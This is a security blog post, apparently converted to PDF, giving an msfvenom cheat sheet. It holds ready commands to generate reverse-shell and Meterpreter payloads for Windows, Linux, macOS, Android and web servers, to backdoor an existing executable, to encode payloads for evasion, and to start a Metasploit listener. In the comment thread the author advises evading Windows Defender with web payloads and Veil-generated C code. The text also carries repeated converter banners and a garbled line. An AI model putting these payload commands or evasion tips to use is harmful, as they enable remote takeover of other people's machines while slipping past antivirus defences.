Lucian NitescuSecurity Blog Home Whoami Archives

Msfvenom Cheat Sheet

Jul 24, 2018 • cheatsheet, offensive_security

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and
msfencode.

Binaries

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Command Info
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS Creates a simple TCP
IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Payload for Windows
msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS Creates a simple HTTP
IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Payload for Windows
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS Creates a simple TCP
IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf Shell for Linux
msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} Creates a simple TCP
LPORT={PORT / Forwarded PORT} -f macho > example.macho Shell for Mac
msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS Creats a simple TCP
IP} LPORT={PORT / Forwarded PORT} R > example.apk Payload for Android

Web Payloads
Command Info
msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} Creats a Simple TCP
LPORT={PORT / Forwarded PORT} -f raw > example.php Shell for PHP
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} Creats a Simple TCP
LPORT={PORT / Forwarded PORT} -f asp > example.asp Shell for ASP
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT= Creats a Simple TCP
{PORT / Forwarded PORT} -f raw > example.jsp Shell for Javascript
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT= Creats a Simple TCP
{PORT / Forwarded PORT} -f war > example.war Shell for WAR

Windows Payloads
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Command Info
Lists all avalaible
msfvenom -l encoders
encoders
Binds an exe with a
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST=
Payload (Backdoors an
{DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
exe)
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS Creates a simple TCP
IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f payload with
exe > example.exe shikata_ga_nai encoder
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST=
Binds an exe with a
{DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e
Payload and encodes it
x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe

How do I get the meterprater shell?

nli@nlistation:~$ sudo msfconsole

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run

Comments
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 8 Comments nitesculucian 
1 Login

 Recommend t Tweet f Share Sort by Best

Join the discussion…

LOG IN WITH
OR SIGN UP WITH DISQUS ?

Name

Zloobyvolf Zl • 6 days ago

Thanks but obsolete for windows 10 . Mse blocked ....:(
△ ▽ • Reply • Share ›

Barney Barnes • 8 months ago

This crap is all obsolete. Windows 10 blocks all msfvenom-generated executables now... you need to
update.
△ ▽ • Reply • Share ›

Lucian Ioan Nitescu Mod > Barney Barnes • 7 months ago

Then you are doing it wrong. Try harder. Also check this out: https://github.com/Veil-Fra...
1△ ▽ • Reply • Share ›

Barney Barnes > Lucian Ioan Nitescu • 6 months ago

Lucian,
I have spent hours trying to install Veil-Evasion in the past on my kali box ... always to no
avail. Note that my box is a standard, completely up-to-date kali installation. Originally it was
kali 2018.3 but now updated to 2019.1. I have no problems running most other software and
I run a lot of packages ... from airodump-ng to hashcat to wifiphisher and many, many more.
They all installed and run seamlessly for the most part.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 ey a sta ed a d u sea ess y o t e ost pa t

But after your response I decided to try again. This time I followed the git instructions to the
letter. But I must tell you the setup.py routine is a literal nightmare. It jumps all over the
place, intersperses error message and gives you not a clue as to what needs to be done.
Yet it did install this time. So, I selected module #49 (ruby/meterpreter/new_tcp) and it
generated an executable which I immediately copied to my Windows box. But when I ran it:
"the file or folder is corruptible and unreadable"

Now I have spent a lot of time on other packages and gotten them to work, e.g. gophish,
free-radius, eclipse etc. I would appreciate it if you give me some suggestions?

Thanks,
△ ▽ • Reply • Share ›

Barney Barnes > Barney Barnes • 6 months ago

Another update: I have used ftp, http and gmail to try to transfer the veil-evasion-
generated exe. Ftp and http (vsftpd and apache servers) both state the file is
"corrupt". Gmail flat out says there is a virus contained in it. I have to believe that
either Defender or another AV on Win 10 is catching this stuff? I also used Wil
Alsopp's latest method on p. 124 of "Advanced Penetration Testing" ... same results.
1△ ▽ • Reply • Share ›

Barney Barnes > Barney Barnes • 6 months ago

Ok, Lucian, I spent all afternoon testing each of your methods on this webpage and
this is the final result in the order in which they appear on this page:

The simple Windows payload was busted by Windows in every transfer method I
tried, including http and ftp.

The HTTP Payload was transferred successfully with my Python server but Defender
would not let it run.

I did not try the three Linux payloads as I'm only interested in Windows at this time.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Amazingly, the PHP Web Payload worked! Firefox on Windows loaded it and it
opened a meterpreter shell on Kali. I will pursue this further for sure.

I do not have server software for .asp, .jsp or .war but it would appear they also quite
possibly would work.

The three Windows Payloads:

The .exe/payload binder resulted in the following error message in msfvenom:

see more

1△ ▽ • Reply • Share ›

Lucian Ioan Nitescu Mod > Barney Barnes • 6 months ago

Hi man, are you doing a lab or something? Always use web payloads when you can
as generally there are not so well checked. Also, try to use the veil to generate the C
(as in C) payload and then use https://github.com/xoreaxea... to compile the C code.
△ ▽ • Reply • Share ›

Barney Barnes > Lucian Ioan Nitescu • 6 months ago

ok Lucian thanks,

I'll get back to you on this soon. yes i have a small lab. i also do a lot
of field work. Im' about an hour out of Los Angeles
△ ▽ • Reply • Share ›

ALSO ON NITESCULUCIAN

AttackDefense.com [SXSS] - YetiForce CRM Exploiting the xmlrpc.php on all WordPress

2 comments • a year ago versions
Lucian Ioan Nitescu — Version 3.0.0 was the 1 comment • 3 months ago
Avatarprovided vulnerable version of YetiForce CRM on the Sudan Ba — Hi Sir ,, thanks for the write up ..can you
AttackDefense.com for training and learning Avatarexplain how to get GET

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 request from PostBin?

Metasploit Cheat Sheet

2 comments • 10 months ago
Hunter Foo — Could you please do a write up on
Avatarmeterpreter basic from attackdefense.com?
Appreciate that.

✉ Subscribe d Add Disqus to your site 🔒 Disqus' Privacy Policy

© Lucian Nitescu - Powered by Jekyll & whiteglass - Subscribe via RSS | Privacy Policy | Legal Disclaimer

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD